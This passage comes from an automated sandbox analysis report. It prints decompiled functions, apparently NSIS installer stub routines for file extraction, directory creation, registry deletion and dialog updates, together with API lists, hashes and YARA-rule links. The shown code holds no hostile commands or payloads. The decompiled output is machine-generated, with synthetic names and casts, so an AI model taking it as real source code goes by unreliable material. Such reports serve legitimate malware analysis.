                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                            • String ID:
                                                                            • API String ID: 1495540970-0
                                                                            • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                            • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004067C4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                            0x004067c6
                                                                            0x004067cf
                                                                            0x004067e6
                                                                            0x004067e6
                                                                            0x004067ed
                                                                            0x004067f9
                                                                            0x004067f9
                                                                            0x004067fc
                                                                            0x004067ff
                                                                            0x00406804
                                                                            0x00406806
                                                                            0x0040680f
                                                                            0x00406813
                                                                            0x00406830
                                                                            0x00406838
                                                                            0x00406838
                                                                            0x0040683d
                                                                            0x0040683f
                                                                            0x00406842
                                                                            0x00406847
                                                                            0x00406848
                                                                            0x0040684c
                                                                            0x0040684c
                                                                            0x0040684d
                                                                            0x00406854
                                                                            0x00406856
                                                                            0x0040685d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406865
                                                                            0x0040686b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040686b
                                                                            0x00406870

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-3083651966
                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404E54, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                            0x00404e62
                                                                            0x00404e6f
                                                                            0x00404e75
                                                                            0x00404eb3
                                                                            0x00404eb3
                                                                            0x00404ec2
                                                                            0x00404ec9
                                                                            0x00000000
                                                                            0x00404ecb
                                                                            0x00404e77
                                                                            0x00404e86
                                                                            0x00404e8e
                                                                            0x00404e91
                                                                            0x00404ea3
                                                                            0x00404ea9
                                                                            0x00404eb0
                                                                            0x00000000
                                                                            0x00404eb0
                                                                            0x00000000

                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                            • GetMessagePos.USER32 ref: 00404E77
                                                                            • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402F93, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x20207
					_t11 =  *0x42aa24; // 0x2020b
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                            0x00402fa3
                                                                            0x00402fb1
                                                                            0x00402fb7
                                                                            0x00402fb7
                                                                            0x00402fc5
                                                                            0x00402fc7
                                                                            0x00402fcd
                                                                            0x00402fd4
                                                                            0x00402fd6
                                                                            0x00402fd6
                                                                            0x00402fec
                                                                            0x00402ffc
                                                                            0x0040300e
                                                                            0x0040300e
                                                                            0x00403016

                                                                            APIs
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402950, Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                            0x00402950
                                                                            0x00402952
                                                                            0x00402957
                                                                            0x0040295c
                                                                            0x0040295f
                                                                            0x00402969
                                                                            0x0040296d
                                                                            0x0040296d
                                                                            0x00402973
                                                                            0x00402980
                                                                            0x00402988
                                                                            0x0040298b
                                                                            0x00402997
                                                                            0x0040299a
                                                                            0x004029a0
                                                                            0x004029ae
                                                                            0x004029b3
                                                                            0x004029b7
                                                                            0x004029ba
                                                                            0x004029c3
                                                                            0x004029cf
                                                                            0x004029d3
                                                                            0x004029d6
                                                                            0x004029e0
                                                                            0x004029ff
                                                                            0x004029ec
                                                                            0x004029f4
                                                                            0x004029f7
                                                                            0x004029fc
                                                                            0x004029fc
                                                                            0x00402a06
                                                                            0x00402a06
                                                                            0x00402a13
                                                                            0x00402a19
                                                                            0x00402a1f
                                                                            0x00402a1f
                                                                            0x004029b7
                                                                            0x00402a33
                                                                            0x00402a35
                                                                            0x00402a35
                                                                            0x00402a3f
                                                                            0x00402a40
                                                                            0x00402a44
                                                                            0x00402a48
                                                                            0x00402a4e
                                                                            0x00402a4e
                                                                            0x00402a55
                                                                            0x004022f1
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                            • CloseHandle.KERNEL32(?), ref: 00402A35
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405A6E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				if(CreateDirectoryW(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                                            0x00405a79
                                                                            0x00405a7d
                                                                            0x00405a80
                                                                            0x00405a86
                                                                            0x00405a8a
                                                                            0x00405a8e
                                                                            0x00405a96
                                                                            0x00405a9d
                                                                            0x00405aa3
                                                                            0x00405aaa
                                                                            0x00405ab9
                                                                            0x00405abb
                                                                            0x00000000
                                                                            0x00405abb
                                                                            0x00405ac5
                                                                            0x00405acc
                                                                            0x00405ae2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ae4
                                                                            0x00405ae8

                                                                            APIs
                                                                            • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                            • GetLastError.KERNEL32 ref: 00405AE4
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3449924974-4017390910
                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402EA9, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 48%
                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                            0x00402eb4
                                                                            0x00402ebd
                                                                            0x00402ec6
                                                                            0x00402ed2
                                                                            0x00402edb
                                                                            0x00402ee5
                                                                            0x00402f0a
                                                                            0x00402f10
                                                                            0x00402f15
                                                                            0x00402f16
                                                                            0x00402f46
                                                                            0x00402f1f
                                                                            0x00402f21
                                                                            0x00402f71
                                                                            0x00402f74
                                                                            0x00000000
                                                                            0x00402f7a
                                                                            0x00402f30
                                                                            0x00402f35
                                                                            0x00402f37
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f3f
                                                                            0x00402f44
                                                                            0x00402f45
                                                                            0x00402f45
                                                                            0x00402f52
                                                                            0x00402f5a
                                                                            0x00402f61
                                                                            0x00000000
                                                                            0x00402f8a
                                                                            0x00000000
                                                                            0x00402f69
                                                                            0x00402ef5
                                                                            0x00402f08
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f08
                                                                            0x00402f90

                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401D81, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                            0x00401d81
                                                                            0x00401d85
                                                                            0x00401d9a
                                                                            0x00401d87
                                                                            0x00401d89
                                                                            0x00401d8f
                                                                            0x00401d8f
                                                                            0x00401da0
                                                                            0x00401da3
                                                                            0x00401dad
                                                                            0x00401db0
                                                                            0x00401db8
                                                                            0x00401dc9
                                                                            0x00401dcc
                                                                            0x00401dd7
                                                                            0x00401dce
                                                                            0x00401dd0
                                                                            0x00401dd0
                                                                            0x00401ddb
                                                                            0x00401de5
                                                                            0x00401e0c
                                                                            0x00401e1b
                                                                            0x00401e29
                                                                            0x00401e31
                                                                            0x00401e39
                                                                            0x00401e39
                                                                            0x00401e42
                                                                            0x00401e48
                                                                            0x00402ba4
                                                                            0x00402ba4
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                            • GetClientRect.USER32 ref: 00401DE5
                                                                            • LoadImageW.USER32 ref: 00401E15
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
